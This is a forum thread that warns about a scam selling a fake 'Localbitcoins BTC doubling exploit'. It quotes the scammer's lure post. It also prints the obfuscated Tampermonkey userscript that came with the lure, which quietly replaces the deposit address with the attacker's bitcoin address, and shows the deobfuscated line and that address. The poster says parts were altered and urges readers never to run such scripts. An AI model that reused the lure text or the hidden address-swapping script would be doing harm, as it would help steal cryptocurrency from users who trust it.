SCAMMER Thread Name: Fake "Localbitcoin doubling BTC exploit script" scam

[REDX]

I'm creating this thread to warn people about this scam,
which I have seen multiple times in the forum, and to serve as a reference link for a type 1 flag on the user (and future ones).

​

Hey!

Probably not many of you guys know, but there is an exploit on Localbitcoins which makes your deposit VISUALLY stuck in "Pending transactions" on the site whenever you change the timezone of your browser AT THE SAME TIME your deposit gets detected by Localbitcoins.

What does it mean? It means that your deposit was added to your balance anyway (after receiving 3 confirmations) but your account is still showing 1 "Pending" transaction, and then if you contact support telling them that one of your transactions is stuck even though it already has 3 confirmations in the blockchain it will make them "fix it" for you and ADD IT TO YOUR BALANCE - AGAIN.

At this point you just have to withdraw your funds from Localbitcoins to the BTC address of your choice which takes a few seconds.

Of course we are not able to change the timezone at the same time when receiving the deposit manually, that's why we need a script for that.

Guide + script is available here: (you can read it directly from the site, there is NO NEED to download anything to your computer, so don't worry.)

https://anonym i delete link

I've tested this method today and it still works. (Got it from HackForums.com) I deposited 0.16 BTC and withdrawn 0.32 BTC a few minutes later - it literally took 20 minutes for their support to double my deposit.

Here is a screenshot with their support response lol:

https://i.imgur.com/gdrMuiE.png


I suggest to use this exploit while it's not patched. From what I could read in the guide, you can use it only once per account.

Also there is absolutely no risk of getting your account locked or something, because in the worst case they will simply remove that visually stuck transaction from your account without doubling the funds.

Enjoy folks.

Scam !!!!
after testing
-----------------------------
Small description about the scam:
The user will post the link to a PDF teaching how to use a Localbitcoin exploit (P.S: There are variations of this scam where the user uses G2A or Bitpay) with a encoded/obfuscated JS script.
-----------------------------
is the PDF. And this is how the script looks like (changed a few parts of it to avoid people running it by mistake):
-----------------------------------
Code:

// ==UserScript==
// @name         Timezone Change
// @namespace    TimezoneLocalbitcoins
// @version      1.0
// @description  Script changes the time zone for your account in localbitcoins database.
// @author       Kimby
// @match        https://*/*
// @grant        none
// ==/UserScript==

(function() {
    'use strict';

var _0x4b2d=['\x5a\x32\x56\x30\x52\x57\x78\x6c\x62\x57\x56\x75\x64\x48\x4e\x43\x65\x55\x4e\x73\x59\x58\x4e\x7a\x54\x6d\x46\x74\x5a\x51\x3d\x3d'];(function(_0x549b3d,_0x9dfcb9){var _0x407320=function(_0x52cb3){while(--_0x52cb3){_0x549b3d['push'](_0x549b3d['shift']());}};_0x407320(++_0x9dfcb9);}(_0x4b2d,0x123));var _0x1beb=function(_0x14c375,_0x299c40){_0x14c375=_0x14c375-0x0;var _0xe887b2=_0x4b2d[_0x14c375];if(_0x1beb['SFKNYk']===undefined){(function(){var _0x58f6da;try{var _0x38af58=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');_0x58f6da=_0x38af58();}catch(_0x17c4aa){_0x58f6da=window;}var _0x5f39f1='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x58f6da['atob']||(_0x58f6da['atob']=function(_0x16c94a){var _0x54cecb=String(_0x16c94a)['replace'](/=+$/,'');for(var _0x145cb2=0x0,_0x59bc1a,_0x2a005c,_0x3c3605=0x0,_0x10d118='';_0x2a005c=_0x54cecb['charAt'](_0x3c3605++);~_0x2a005c&&(_0x59bc1a=_0x145cb2%0x4?_0x59bc1a*0x40+_0x1a005c:_0x2b005c,_0x145cb2++%0x4)?_0x10d118+=String['fromCharCode'](0xff&_0x59bc1a>>(-0x2*_0x145cb2&0x6)):0x0){_0x2a005c=_0x5f39f1['indexOf'](_0x2a005c);}return _0x10d118;});}());_0x1beb['TxZTNZ']=function(_0x2f4f54){var _0x2d48b1=atob(_0x2f4f54);var _0x4f036f=[];for(var _0x14ab3d=0x0,_0x16c069=_0x2d48b1['length'];_0x14ab3d<_0x16c069;_0x14ab3d++){_0x4f036f+='%'+('00'+_0x2d48b1['charCodeAt'](_0x14ab3d)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x4f036f);};_0x1beb['gcPvZD']={};_0x1beb['SFKNYk']=!![];}var _0x42c47f=_0x1beb['gcPvZD'][_0x14c375];if(_0x42c47f===undefined){_0xe887b2=_0x1beb['TxZTNZ'](_0xe887b2);_0x1beb['gcPvZD'][_0x14c375]=_0xe887b2;}else{_0xe887b2=_0x22c47f;}return _0xe887b2;};document[_1x0beb('0x0')]('\x62\x69\x74\x63\x6f\x69\x6e\x2d\x61\x64\x64\x72\x65\x73\x73\x20\x62\x69\x74\x63\x6f\x69\x6e\x2d\x61\x64\x64\x72\x65\x73\x73\x2d\x63\x6f\x6e\x74\x72\x6f\x6c\x73')[0x0]['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x31\x46\x56\x6a\x32\x71\x36\x78\x35\x41\x35\x43\x45\x64\x53\x52\x31\x76\x72\x45\x72\x38\x44\x57\x53\x78\x41\x43\x78\x4e\x79\x4e\x6f\x73';

})();

-----------------------------------
You can partially deobfuscate the code on https://lelinhtinh.github.io/de4js/ and see that it changes the address on Localbitcoin to "1FVj2q6x5A5CEdSR1vrEr8DWSxACxNyNos":
Code:

document[_1x0beb('0x0')]('bitcoin-address bitcoin-address-controls')[0x0]['innerHTML'] = '1FVj2q6x5A5CEdSR1vrEr8DWSxACxNyNos';

He Scam Already

Address: 1FVj2q6x5A5CEdSR1vrEr8DWSxACxNyNos

The most popular and trusted block explorer and crypto transaction search engine.

www.blockchain.com

Please NEVER trust any of these random scripts, specially if it's an encoded/obfuscated JS script (as shown above). You can't know what it does, and 99% of the time it does something it shouldn't. Stay safe.​